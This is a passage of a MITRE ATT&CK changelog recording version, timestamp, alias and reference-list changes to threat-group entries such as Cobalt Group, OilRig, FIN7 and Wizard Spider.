external_references[1]['description'](Citation: Talos Cobalt Group July 2018) (Citation: PTSecurity Cobalt Group Aug 2017) (Citation: PTSecurity Cobalt Dec 2016) (Citation: Proofpoint Cobalt June 2017) (Citation: RiskIQ Cobalt Nov 2017) (Citation: RiskIQ Cobalt Jan 2018)(Citation: Crowdstrike Global Threat Report Feb 2018)
external_references[4]['source_name']Cobalt SpiderCobalt Group
external_references[4]['description'](Citation: Crowdstrike Global Threat Report Feb 2018)(Citation: Talos Cobalt Group July 2018) (Citation: PTSecurity Cobalt Group Aug 2017) (Citation: PTSecurity Cobalt Dec 2016) (Citation: Proofpoint Cobalt June 2017) (Citation: RiskIQ Cobalt Nov 2017) (Citation: RiskIQ Cobalt Jan 2018)
external_references[5]['source_name']Talos Cobalt Group July 2018Crowdstrike Global Threat Report Feb 2018
external_references[5]['description']Svajcer, V. (2018, July 31). Multiple Cobalt Personality Disorder. Retrieved September 5, 2018.CrowdStrike. (2018, February 26). CrowdStrike 2018 Global Threat Report. Retrieved October 10, 2018.
external_references[5]['url']https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.htmlhttps://crowdstrike.lookbookhq.com/global-threat-report-2018-web/cs-2018-global-threat-report
external_references[6]['source_name']PTSecurity Cobalt Group Aug 2017Secureworks GOLD KINGSWOOD September 2018
external_references[6]['description']Positive Technologies. (2017, August 16). Cobalt Strikes Back: An Evolving Multinational Threat to Finance. Retrieved September 5, 2018.CTU. (2018, September 27). Cybercriminals Increasingly Trying to Ensnare the Big Financial Fish. Retrieved September 20, 2021.
external_references[6]['url']https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-2017-eng.pdfhttps://www.secureworks.com/blog/cybercriminals-increasingly-trying-to-ensnare-the-big-financial-fish
external_references[7]['source_name']PTSecurity Cobalt Dec 2016Europol Cobalt Mar 2018
external_references[7]['description']Positive Technologies. (2016, December 16). Cobalt Snatch. Retrieved October 9, 2018.Europol. (2018, March 26). Mastermind Behind EUR 1 Billion Cyber Bank Robbery Arrested in Spain. Retrieved October 10, 2018.
external_references[7]['url']https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-Snatch-eng.pdfhttps://www.europol.europa.eu/newsroom/news/mastermind-behind-eur-1-billion-cyber-bank-robbery-arrested-in-spain
external_references[8]['source_name']Group IB Cobalt Aug 2017Morphisec Cobalt Gang Oct 2018
external_references[8]['description']Matveeva, V. (2017, August 15). Secrets of Cobalt. Retrieved October 10, 2018.Gorelik, M. (2018, October 08). Cobalt Group 2.0. Retrieved November 5, 2018.
external_references[8]['url']https://www.group-ib.com/blog/cobalthttps://blog.morphisec.com/cobalt-gang-2.0
external_references[9]['source_name']Proofpoint Cobalt June 2017RiskIQ Cobalt Nov 2017
external_references[9]['description']Mesa, M, et al. (2017, June 1). Microsoft Word Intruder Integrates CVE-2017-0199, Utilized by Cobalt Group to Target Financial Institutions. Retrieved October 10, 2018.Klijnsma, Y.. (2017, November 28). Gaffe Reveals Full List of Targets in Spear Phishing Attack Using Cobalt Strike Against Financial Institutions. Retrieved October 10, 2018.
external_references[9]['url']https://www.proofpoint.com/us/threat-insight/post/microsoft-word-intruder-integrates-cve-2017-0199-utilized-cobalt-group-targethttps://web.archive.org/web/20190508170630/https://www.riskiq.com/blog/labs/cobalt-strike/
external_references[10]['source_name']RiskIQ Cobalt Nov 2017RiskIQ Cobalt Jan 2018
external_references[10]['description']Klijnsma, Y.. (2017, November 28). Gaffe Reveals Full List of Targets in Spear Phishing Attack Using Cobalt Strike Against Financial Institutions. Retrieved October 10, 2018.Klijnsma, Y.. (2018, January 16). First Activities of Cobalt Group in 2018: Spear Phishing Russian Banks. Retrieved October 10, 2018.
external_references[10]['url']https://www.riskiq.com/blog/labs/cobalt-strike/https://web.archive.org/web/20190508170147/https://www.riskiq.com/blog/labs/cobalt-group-spear-phishing-russian-banks/
external_references[11]['source_name']RiskIQ Cobalt Jan 2018Group IB Cobalt Aug 2017
external_references[11]['description']Klijnsma, Y.. (2018, January 16). First Activities of Cobalt Group in 2018: Spear Phishing Russian Banks. Retrieved October 10, 2018.Matveeva, V. (2017, August 15). Secrets of Cobalt. Retrieved October 10, 2018.
external_references[11]['url']https://www.riskiq.com/blog/labs/cobalt-group-spear-phishing-russian-banks/https://www.group-ib.com/blog/cobalt
external_references[12]['source_name']Europol Cobalt Mar 2018Proofpoint Cobalt June 2017
external_references[12]['description']Europol. (2018, March 26). Mastermind Behind EUR 1 Billion Cyber Bank Robbery Arrested in Spain. Retrieved October 10, 2018.Mesa, M, et al. (2017, June 1). Microsoft Word Intruder Integrates CVE-2017-0199, Utilized by Cobalt Group to Target Financial Institutions. Retrieved October 10, 2018.
external_references[12]['url']https://www.europol.europa.eu/newsroom/news/mastermind-behind-eur-1-billion-cyber-bank-robbery-arrested-in-spainhttps://www.proofpoint.com/us/threat-insight/post/microsoft-word-intruder-integrates-cve-2017-0199-utilized-cobalt-group-target
external_references[13]['source_name']Secureworks GOLD KINGSWOOD September 2018PTSecurity Cobalt Dec 2016
external_references[13]['description']CTU. (2018, September 27). Cybercriminals Increasingly Trying to Ensnare the Big Financial Fish. Retrieved September 20, 2021.Positive Technologies. (2016, December 16). Cobalt Snatch. Retrieved October 9, 2018.
external_references[13]['url']https://www.secureworks.com/blog/cybercriminals-increasingly-trying-to-ensnare-the-big-financial-fishhttps://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-Snatch-eng.pdf
external_references[14]['source_name']Crowdstrike Global Threat Report Feb 2018PTSecurity Cobalt Group Aug 2017
external_references[14]['description']CrowdStrike. (2018, February 26). CrowdStrike 2018 Global Threat Report. Retrieved October 10, 2018.Positive Technologies. (2017, August 16). Cobalt Strikes Back: An Evolving Multinational Threat to Finance. Retrieved September 5, 2018.
external_references[14]['url']https://crowdstrike.lookbookhq.com/global-threat-report-2018-web/cs-2018-global-threat-reporthttps://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-2017-eng.pdf
external_references[15]['source_name']Morphisec Cobalt Gang Oct 2018Talos Cobalt Group July 2018
external_references[15]['description']Gorelik, M. (2018, October 08). Cobalt Group 2.0. Retrieved November 5, 2018.Svajcer, V. (2018, July 31). Multiple Cobalt Personality Disorder. Retrieved September 5, 2018.
external_references[15]['url']https://blog.morphisec.com/cobalt-gang-2.0https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html
x_mitre_version2.02.1

[G1003] Ember Bear

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-14 15:03:19.292000+00:002023-03-22 03:40:53.311000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[G0037] FIN6

Current version: 3.3

Version changed from: 3.2 → 3.3

Details
values_changed
STIX FieldOld valueNew Value
modified2022-06-02 20:11:01.957000+00:002023-03-22 03:50:17.471000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version3.23.3

[G0046] FIN7

Current version: 2.2

Version changed from: 2.1 → 2.2

Details
values_changed
STIX FieldOld valueNew Value
modified2022-07-20 20:06:44.706000+00:002023-03-22 03:51:04.185000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version2.12.2

[G0061] FIN8

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-10-12 21:31:07.407000+00:002023-03-22 03:52:13.089000+00:00
external_references[2]['url']https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.htmlhttps://web.archive.org/web/20170923102302/https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html
x_mitre_version1.21.3

[G0117] Fox Kitten

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-06-02 20:12:00.458000+00:002023-03-22 03:53:37.888000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[G0047] Gamaredon Group

Current version: 2.1

Version changed from: 2.0 → 2.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-15 13:46:34.474000+00:002023-03-22 04:29:39.915000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version2.02.1

[G0125] HAFNIUM

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
values_changed
STIX FieldOld valueNew Value
modified2022-07-06 20:05:26.079000+00:002023-04-10 21:54:46.756000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.21.3
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_contributorsVinayak Wadhwa, SAFE Security

[G1001] HEXANE

Current version: 2.1

Version changed from: 2.0 → 2.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-08-31 22:16:30.454000+00:002023-03-22 04:43:59.082000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_domains[0]ics-attackenterprise-attack
x_mitre_domains[1]enterprise-attackics-attack
x_mitre_version2.02.1

[G1004] LAPSUS$

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-12 12:21:38.612000+00:002023-04-11 00:01:29.232000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[G0032] Lazarus Group

Current version: 3.2

Version changed from: 3.1 → 3.2

Details
values_changed
STIX FieldOld valueNew Value
modified2022-08-23 15:30:44.196000+00:002023-03-30 19:01:41.451000+00:00
external_references[6]['url']https://adversary.crowdstrike.com/en-US/adversary/labyrinth-chollima/https://web.archive.org/web/20210723190317/https://adversary.crowdstrike.com/en-US/adversary/labyrinth-chollima/
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version3.13.2

[G0140] LazyScripter

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-15 19:09:59.211000+00:002023-03-22 04:49:29.731000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[G0077] Leafminer

Current version: 2.4

Version changed from: 2.3 → 2.4

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-10-12 23:23:16.109000+00:002023-03-22 04:50:51.782000+00:00
external_references[1]['source_name']LeafminerRaspite
external_references[1]['description'](Citation: Symantec Leafminer July 2018)(Citation: Dragos Raspite Aug 2018)
external_references[2]['source_name']RaspiteLeafminer
external_references[2]['description'](Citation: Dragos Raspite Aug 2018)(Citation: Symantec Leafminer July 2018)
external_references[3]['source_name']Symantec Leafminer July 2018Dragos Raspite Aug 2018
external_references[3]['description']Symantec Security Response. (2018, July 25). Leafminer: New Espionage Campaigns Targeting Middle Eastern Regions. Retrieved August 28, 2018.Dragos, Inc. (2018, August 2). RASPITE. Retrieved November 26, 2018.
external_references[3]['url']https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-easthttps://www.dragos.com/blog/20180802Raspite.html
external_references[4]['source_name']Dragos Raspite Aug 2018Symantec Leafminer July 2018
external_references[4]['description']Dragos, Inc. (2018, August 2). RASPITE. Retrieved November 26, 2018.Symantec Security Response. (2018, July 25). Leafminer: New Espionage Campaigns Targeting Middle Eastern Regions. Retrieved August 28, 2018.
external_references[4]['url']https://www.dragos.com/blog/20180802Raspite.htmlhttps://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east
x_mitre_version2.32.4

[G0059] Magic Hound

Current version: 5.1

Version changed from: 5.0 → 5.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-06-03 13:20:02.945000+00:002023-01-13 21:18:18.077000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version5.05.1

[G0069] MuddyWater

Current version: 4.1

Version changed from: 4.0 → 4.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-17 12:43:55.847000+00:002023-03-22 04:59:16.032000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version4.04.1

[G0129] Mustang Panda

Current version: 2.1

Version changed from: 2.0 → 2.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-11 16:43:52.231000+00:002023-03-22 22:01:13.781000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version2.02.1

[G0049] OilRig

Current version: 3.1

Version changed from: 3.0 → 3.1


Old Description
New Description
t1[OilRig](https://attack.mitre.org/groups/G0049) is a suspectt1[OilRig](https://attack.mitre.org/groups/G0049) is a suspect
>ed Iranian threat group that has targeted Middle Eastern and>ed Iranian threat group that has targeted Middle Eastern and
> international victims since at least 2014. The group has ta> international victims since at least 2014. The group has ta
>rgeted a variety of sectors, including financial, government>rgeted a variety of sectors, including financial, government
>, energy, chemical, and telecommunications. It appears the g>, energy, chemical, and telecommunications. It appears the g
>roup carries out supply chain attacks, leveraging the trust >roup carries out supply chain attacks, leveraging the trust 
>relationship between organizations to attack their primary t>relationship between organizations to attack their primary t
>argets. FireEye assesses that the group works on behalf of t>argets. FireEye assesses that the group works on behalf of t
>he Iranian government based on infrastructure details that c>he Iranian government based on infrastructure details that c
>ontain references to Iran, use of Iranian infrastructure, an>ontain references to Iran, use of Iranian infrastructure, an
>d targeting that aligns with nation-state interests.(Citatio>d targeting that aligns with nation-state interests.(Citatio
>n: Palo Alto OilRig April 2017)(Citation: ClearSky OilRig Ja>n: Palo Alto OilRig April 2017)(Citation: ClearSky OilRig Ja
>n 2017)(Citation: Palo Alto OilRig May 2016)(Citation: Palo >n 2017)(Citation: Palo Alto OilRig May 2016)(Citation: Palo 
>Alto OilRig Oct 2016)(Citation: Unit 42 Playbook Dec 2017)(C>Alto OilRig Oct 2016)(Citation: Unit42 OilRig Playbook 2023)
>itation: FireEye APT34 Dec 2017)(Citation: Unit 42 QUADAGENT>(Citation: FireEye APT34 Dec 2017)(Citation: Unit 42 QUADAGE
> July 2018)>NT July 2018)
Details
dictionary_item_added
STIX FieldOld valueNew Value
external_referenceshttps://www.secureworks.com/research/threat-profiles/cobalt-gypsy
dictionary_item_removed
STIX FieldOld valueNew Value
external_referenceshttps://research.checkpoint.com/2021/irans-apt34-returns-with-an-updated-arsenal/
external_referenceshttps://pan-unit42.github.io/playbook_viewer/
values_changed
STIX FieldOld valueNew Value
modified2022-06-02 20:18:52.733000+00:002023-02-06 20:58:52.317000+00:00
description[OilRig](https://attack.mitre.org/groups/G0049) is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of sectors, including financial, government, energy, chemical, and telecommunications. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. FireEye assesses that the group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests.(Citation: Palo Alto OilRig April 2017)(Citation: ClearSky OilRig Jan 2017)(Citation: Palo Alto OilRig May 2016)(Citation: Palo Alto OilRig Oct 2016)(Citation: Unit 42 Playbook Dec 2017)(Citation: FireEye APT34 Dec 2017)(Citation: Unit 42 QUADAGENT July 2018)[OilRig](https://attack.mitre.org/groups/G0049) is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of sectors, including financial, government, energy, chemical, and telecommunications. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. FireEye assesses that the group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests.(Citation: Palo Alto OilRig April 2017)(Citation: ClearSky OilRig Jan 2017)(Citation: Palo Alto OilRig May 2016)(Citation: Palo Alto OilRig Oct 2016)(Citation: Unit42 OilRig Playbook 2023)(Citation: FireEye APT34 Dec 2017)(Citation: Unit 42 QUADAGENT July 2018)
external_references[5]['source_name']Check Point APT34 April 2021Evasive Serpens
external_references[5]['description']Check Point. (2021, April 8). Iran’s APT34 Returns with an Updated Arsenal. Retrieved May 5, 2021.(Citation: Unit42 OilRig Playbook 2023)
external_references[6]['source_name']ClearSky OilRig Jan 2017Check Point APT34 April 2021
external_references[6]['description']ClearSky Cybersecurity. (2017, January 5). Iranian Threat Agent OilRig Delivers Digitally Signed Malware, Impersonates University of Oxford. Retrieved May 3, 2017.Check Point. (2021, April 8). Iran’s APT34 Returns with an Updated Arsenal. Retrieved May 5, 2021.
external_references[6]['url']http://www.clearskysec.com/oilrig/https://research.checkpoint.com/2021/irans-apt34-returns-with-an-updated-arsenal/
external_references[7]['source_name']Palo Alto OilRig May 2016ClearSky OilRig Jan 2017
external_references[7]['description']Falcone, R. and Lee, B.. (2016, May 26). The OilRig Campaign: Attacks on Saudi Arabian Organizations Deliver Helminth Backdoor. Retrieved May 3, 2017.ClearSky Cybersecurity. (2017, January 5). Iranian Threat Agent OilRig Delivers Digitally Signed Malware, Impersonates University of Oxford. Retrieved May 3, 2017.
external_references[7]['url']http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/http://www.clearskysec.com/oilrig/
external_references[8]['source_name']Palo Alto OilRig April 2017Palo Alto OilRig May 2016
external_references[8]['description']Falcone, R.. (2017, April 27). OilRig Actors Provide a Glimpse into Development and Testing Efforts. Retrieved May 3, 2017.Falcone, R. and Lee, B.. (2016, May 26). The OilRig Campaign: Attacks on Saudi Arabian Organizations Deliver Helminth Backdoor. Retrieved May 3, 2017.
external_references[8]['url']http://researchcenter.paloaltonetworks.com/2017/04/unit42-oilrig-actors-provide-glimpse-development-testing-efforts/http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/
external_references[9]['source_name']Palo Alto OilRig Oct 2016Palo Alto OilRig April 2017
external_references[9]['description']Grunzweig, J. and Falcone, R.. (2016, October 4). OilRig Malware Campaign Updates Toolset and Expands Targets. Retrieved May 3, 2017.Falcone, R.. (2017, April 27). OilRig Actors Provide a Glimpse into Development and Testing Efforts. Retrieved May 3, 2017.
external_references[9]['url']http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/http://researchcenter.paloaltonetworks.com/2017/04/unit42-oilrig-actors-provide-glimpse-development-testing-efforts/
external_references[10]['source_name']Unit 42 QUADAGENT July 2018Palo Alto OilRig Oct 2016
external_references[10]['description']Lee, B., Falcone, R. (2018, July 25). OilRig Targets Technology Service Provider and Government Agency with QUADAGENT. Retrieved August 9, 2018.Grunzweig, J. and Falcone, R.. (2016, October 4). OilRig Malware Campaign Updates Toolset and Expands Targets. Retrieved May 3, 2017.
external_references[10]['url']https://researchcenter.paloaltonetworks.com/2018/07/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/
external_references[11]['source_name']Crowdstrike Helix Kitten Nov 2018Unit 42 QUADAGENT July 2018
external_references[11]['description']Meyers, A. (2018, November 27). Meet CrowdStrike’s Adversary of the Month for November: HELIX KITTEN. Retrieved December 18, 2018.Lee, B., Falcone, R. (2018, July 25). OilRig Targets Technology Service Provider and Government Agency with QUADAGENT. Retrieved August 9, 2018.
external_references[11]['url']https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-november-helix-kitten/https://researchcenter.paloaltonetworks.com/2018/07/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/
external_references[12]['source_name']FireEye APT34 Dec 2017Crowdstrike Helix Kitten Nov 2018
external_references[12]['description']Sardiwal, M, et al. (2017, December 7). New Targeted Attack in the Middle East by APT34, a Suspected Iranian Threat Group, Using CVE-2017-11882 Exploit. Retrieved December 20, 2017.Meyers, A. (2018, November 27). Meet CrowdStrike’s Adversary of the Month for November: HELIX KITTEN. Retrieved December 18, 2018.
external_references[12]['url']https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.htmlhttps://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-november-helix-kitten/
external_references[13]['source_name']Secureworks COBALT GYPSY Threat ProfileFireEye APT34 Dec 2017
external_references[13]['description']Secureworks. (n.d.). COBALT GYPSY Threat Profile. Retrieved April 14, 2021.Sardiwal, M, et al. (2017, December 7). New Targeted Attack in the Middle East by APT34, a Suspected Iranian Threat Group, Using CVE-2017-11882 Exploit. Retrieved December 20, 2017.
external_references[13]['url']https://www.secureworks.com/research/threat-profiles/cobalt-gypsyhttps://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html
external_references[14]['source_name']APT34Secureworks COBALT GYPSY Threat Profile
external_references[14]['description']This group was previously tracked under two distinct groups, APT34 and OilRig, but was combined due to additional reporting giving higher confidence about the overlap of the activity. (Citation: Unit 42 QUADAGENT July 2018) (Citation: FireEye APT34 Dec 2017)(Citation: Check Point APT34 April 2021)Secureworks. (n.d.). COBALT GYPSY Threat Profile. Retrieved April 14, 2021.
external_references[15]['source_name']Unit 42 Playbook Dec 2017APT34
external_references[15]['description']Unit 42. (2017, December 15). Unit 42 Playbook Viewer. Retrieved December 20, 2017.This group was previously tracked under two distinct groups, APT34 and OilRig, but was combined due to additional reporting giving higher confidence about the overlap of the activity.(Citation: Unit 42 QUADAGENT July 2018)(Citation: FireEye APT34 Dec 2017)(Citation: Check Point APT34 April 2021)
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version3.03.1
iterable_item_added
STIX FieldOld valueNew Value
aliasesEvasive Serpens
external_references{'source_name': 'Unit 42 Playbook Dec 2017', 'description': 'Unit 42. (2017, December 15). Unit 42 Playbook Viewer. Retrieved December 20, 2017.', 'url': 'https://pan-unit42.github.io/playbook_viewer/'}
external_references{'source_name': 'Unit42 OilRig Playbook 2023', 'description': 'Unit42. (2016, May 1). Evasive Serpens Unit 42 Playbook Viewer. Retrieved February 6, 2023.', 'url': 'https://pan-unit42.github.io/playbook_viewer/?pb=evasive-serpens'}

[G0040] Patchwork

Current version: 1.5

Version changed from: 1.4 → 1.5

Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-02 18:04:32.246000+00:002023-03-22 05:08:20.780000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.41.5

[G0121] Sidewinder

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-04-21 12:32:46.791000+00:002023-03-22 05:31:54.382000+00:00
external_references[3]['source_name']ATT Sidewinder January 2021Cyble Sidewinder September 2020
external_references[3]['description']Hegel, T. (2021, January 13). A Global Perspective of the SideWinder APT. Retrieved January 27, 2021.Cyble. (2020, September 26). SideWinder APT Targets with futuristic Tactics and Techniques. Retrieved January 29, 2021.
external_references[3]['url']https://cdn-cybersecurity.att.com/docs/global-perspective-of-the-sidewinder-apt.pdfhttps://cybleinc.com/2020/09/26/sidewinder-apt-targets-with-futuristic-tactics-and-techniques/
external_references[5]['source_name']Cyble Sidewinder September 2020ATT Sidewinder January 2021
external_references[5]['description']Cyble. (2020, September 26). SideWinder APT Targets with futuristic Tactics and Techniques. Retrieved January 29, 2021.Hegel, T. (2021, January 13). A Global Perspective of the SideWinder APT. Retrieved January 27, 2021.
external_references[5]['url']https://cybleinc.com/2020/09/26/sidewinder-apt-targets-with-futuristic-tactics-and-techniques/https://cdn-cybersecurity.att.com/docs/global-perspective-of-the-sidewinder-apt.pdf
x_mitre_version1.01.1

[G0091] Silence

Current version: 2.2

Version changed from: 2.1 → 2.2

Details
values_changed
STIX FieldOld valueNew Value
modified2022-06-02 20:13:56.605000+00:002023-03-22 05:34:46.346000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version2.12.2

[G0092] TA505

Current version: 2.1

Version changed from: 2.0 → 2.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-13 16:17:20.601000+00:002023-03-22 05:38:20.381000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version2.02.1

[G0127] TA551

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-09-30 12:58:59.065000+00:002023-03-22 05:40:21.255000+00:00
external_references[3]['source_name']Secureworks GOLD CABINUnit 42 Valak July 2020
external_references[3]['description']Secureworks. (n.d.). GOLD CABIN Threat Profile. Retrieved March 17, 2021.Duncan, B. (2020, July 24). Evolution of Valak, from Its Beginnings to Mass Distribution. Retrieved August 31, 2020.
external_references[3]['url']https://www.secureworks.com/research/threat-profiles/gold-cabinhttps://unit42.paloaltonetworks.com/valak-evolution/
external_references[5]['source_name']Unit 42 Valak July 2020Secureworks GOLD CABIN
external_references[5]['description']Duncan, B. (2020, July 24). Evolution of Valak, from Its Beginnings to Mass Distribution. Retrieved August 31, 2020.Secureworks. (n.d.). GOLD CABIN Threat Profile. Retrieved March 17, 2021.
external_references[5]['url']https://unit42.paloaltonetworks.com/valak-evolution/https://www.secureworks.com/research/threat-profiles/gold-cabin
x_mitre_version1.11.2

[G0027] Threat Group-3390

Current version: 2.1

Version changed from: 2.0 → 2.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-11 18:05:20.983000+00:002023-03-29 16:53:17.235000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version2.02.1

[G0010] Turla

Current version: 3.1

Version changed from: 3.0 → 3.1

Details
values_changed
STIX FieldOld valueNew Value
modified2022-09-28 21:27:07.133000+00:002023-03-22 05:41:28.428000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version3.03.1

[G0102] Wizard Spider

Current version: 2.1

Version changed from: 2.0 → 2.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-10-14 17:27:41.194000+00:002023-03-22 05:44:27.289000+00:00
external_references[1]['source_name']UNC1878Grim Spider
external_references[1]['description'](Citation: FireEye KEGTAP SINGLEMALT October 2020)(Citation: CrowdStrike Ryuk January 2019)(Citation: CrowdStrike Grim Spider May 2019)
external_references[2]['source_name']TEMP.MixMasterUNC1878
external_references[2]['description'](Citation: FireEye Ryuk and Trickbot January 2019)(Citation: FireEye KEGTAP SINGLEMALT October 2020)
external_references[3]['source_name']Grim SpiderTEMP.MixMaster
external_references[3]['description'](Citation: CrowdStrike Ryuk January 2019)(Citation: CrowdStrike Grim Spider May 2019)(Citation: FireEye Ryuk and Trickbot January 2019)
external_references[4]['source_name']CrowdStrike Ryuk January 2019DHS/CISA Ransomware Targeting Healthcare October 2020
external_references[4]['description']Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020.DHS/CISA. (2020, October 28). Ransomware Activity Targeting the Healthcare and Public Health Sector. Retrieved October 28, 2020.
external_references[4]['url']https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/https://us-cert.cisa.gov/ncas/alerts/aa20-302a
external_references[5]['source_name']DHS/CISA Ransomware Targeting Healthcare October 2020FireEye Ryuk and Trickbot January 2019
external_references[5]['description']DHS/CISA. (2020, October 28). Ransomware Activity Targeting the Healthcare and Public Health Sector. Retrieved October 28, 2020.Goody, K., et al (2019, January 11). A Nasty Trick: From Credential Theft Malware to Business Disruption. Retrieved May 12, 2020.
external_references[5]['url']https://us-cert.cisa.gov/ncas/alerts/aa20-302ahttps://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html
external_references[6]['source_name']CrowdStrike Wizard Spider October 2020CrowdStrike Ryuk January 2019
external_references[6]['description']Podlosky, A., Hanel, A. et al. (2020, October 16). WIZARD SPIDER Update: Resilient, Reactive and Resolute. Retrieved June 15, 2021.Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020.
external_references[6]['url']https://www.crowdstrike.com/blog/wizard-spider-adversary-update/https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/
external_references[7]['source_name']FireEye KEGTAP SINGLEMALT October 2020CrowdStrike Grim Spider May 2019
external_references[7]['description']Kimberly Goody, Jeremy Kennelly, Joshua Shilko, Steve Elovitz, Douglas Bienstock. (2020, October 28). Unhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser. Retrieved October 28, 2020.John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020.
external_references[7]['url']https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.htmlhttps://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/
external_references[8]['source_name']FireEye Ryuk and Trickbot January 2019FireEye KEGTAP SINGLEMALT October 2020
external_references[8]['description']Goody, K., et al (2019, January 11). A Nasty Trick: From Credential Theft Malware to Business Disruption. Retrieved May 12, 2020.Kimberly Goody, Jeremy Kennelly, Joshua Shilko, Steve Elovitz, Douglas Bienstock. (2020, October 28). Unhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser. Retrieved October 28, 2020.
external_references[8]['url']https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.htmlhttps://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html
